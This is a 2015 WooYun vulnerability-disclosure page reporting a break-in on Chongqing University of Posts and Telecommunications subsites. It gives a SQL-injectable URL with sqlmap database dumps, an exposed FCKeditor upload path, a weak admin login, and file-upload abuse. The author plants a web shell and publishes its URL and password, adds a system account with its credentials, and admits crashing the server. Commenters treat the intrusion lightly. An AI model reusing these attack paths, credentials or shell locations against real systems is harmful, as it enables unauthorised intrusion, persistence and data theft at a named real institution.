当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102739

漏洞标题:重庆邮电大学#分站漏洞大集合至数据全部沦陷

相关厂商:重庆邮电大学

漏洞作者: zhxs

提交时间:2015-03-24 12:57

修复时间:2015-03-29 12:58

公开时间:2015-03-29 12:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

嘿嘿 前面服务器搞挂了,没通过现在重新来

详细说明:

下手:http://ac.cqupt.edu.cn
此域名下N多二级目录网站
shell到手整站服务器数据全部ko
#1:sql注入
http://ac.cqupt.edu.cn/gclx/nav.php?cat_id=50
sqlmap跑出几个表
Database: auto1
[5 tables]
+---------------------------------------+
| t_attfile |
| t_bank |
| t_message |
| t_notic |
| t_user |
+---------------------------------------+
Current database
[2 tables]
+---------------------------------------+
| pre_portal_category |
| pre_ucenter_admins |
+---------------------------------------+
Database: banjibbs904
[231 tables]
+---------------------------------------+
| None |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_stat_fieldcache |
| pre_common_member_stat_search |
| pre_common_member_stat_searchcache |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_moderate |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_tlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupranking |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_tableid |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_postposition |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_threadclass |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_docomment |
| pre_home_doing |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_myrepeats |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
+---------------------------------------+
Database: analyse
[22 tables]
+---------------------------------------+
| ym_addimage |
| ym_admin_action |
| ym_admin_action_log |
| ym_admin_login_log |
| ym_admin_role |
| ym_admin_user |
| ym_attach |
| ym_cat |
| ym_document |
| ym_image |
| ym_mail |
| ym_media |
| ym_member |
| ym_member_detail |
| ym_member_mail |
| ym_message |
| ym_model |
| ym_onepage |
| ym_record |
| ym_record_detail |
| ym_sys_config |
| ym_sys_enum |
+---------------------------------------+
Database: auto
[5 tables]
+---------------------------------------+
| t_attfile |
| t_bank |
| t_message |
| t_notic |
| t_user |
+---------------------------------------+
Database: autocourse
[16 tables]
+---------------------------------------+
| access |
| admin |
| admin_role |
| article |
| attachment |
| carousel |
| course |
| department |
| indexpics |
| introduce |
| message |
| pre_common_member |
| resource |
| role |
| role_sysmenu |
| sysmenu |
+---------------------------------------+
Database: automation
[25 tables]
+---------------------------------------+
| blues_admin |
| blues_admin_action |
| blues_admin_doing |
| blues_admin_log_action |
| blues_admin_log_report |
| blues_cat |
| blues_file |
| blues_flash |
| blues_href |
| blues_href_cat |
| blues_image |
| blues_limitword |
| blues_log |
| blues_media |
| blues_menu |
| blues_msg |
| blues_nav |
| blues_news |
| blues_onepage |
| blues_right |
| blues_type |
| blues_vip |
| blues_vote_class |
| blues_vote_las |
| blues_vote_mid |
+---------------------------------------+
Database: autocontrol
[7 tables]
+---------------------------------------+
| t_attfile |
| t_bank |
| t_message |
| t_notic |
| t_notic1 |
| t_notic2 |
| t_user |
+---------------------------------------+

#2:FCK编辑器漏洞上传
http://ac.cqupt.edu.cn/gclx//admin/fckeditor/editor/filemanager/connectors/uploadtest.html
#3:后台弱口令
http://ac.cqupt.edu.cn/gclx/admin/
admin admin
#4:后台任意文件上传
系统设置→基本设置→附件上传修改上传文件格式

1.png


还可以浏览修改所有数据盘数据
这是我见过最的分区:8个盘
另外我还发现一匹别人的马很久以前的了 管理员做啥去了
http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1369642461_conf.php

漏洞证明:

菜刀马儿
http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1426668641_2.php
password:110
shell

8.png


system权限 帐号已经添加上 admini jyhack123
服务器有安全狗估计那里做策略了远程不了,不继续了 已经搞挂一次

2.jpg


整个数据

4.png


应该差不多了吧、
求给20RANK

修复方案:

安全够没有配置好注入不拦截,修改默认口令
C:\RECYCLER\1.txt
服务器已经被黑阔抓hash了 仔细检测下吧=你这安全狗没啥用

版权声明:转载请注明来源 zhxs@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-29 12:58

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-24 14:14 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    师傅好犀利啊

  2. 2015-03-31 13:06 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    第一次听说@CCERT教育网应急响应组 也能忽略

  3. 2015-04-17 20:02 | 沉沦哥 ( 路人 | Rank:9 漏洞数:4 | 等待是幸福的,但哥不喜欢等待。)

    卧槽。删我马儿干嘛。

  4. 2015-04-17 20:04 | 君莫笑 ( 路人 | Rank:15 漏洞数:13 | 热爱生活的喵)

    同学别乱搞,原来是你把服务器搞挂了,,,,tmd吓死我了

  5. 2015-04-18 20:00 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    @君莫笑 ⊙﹏⊙‖∣ 真的么 、、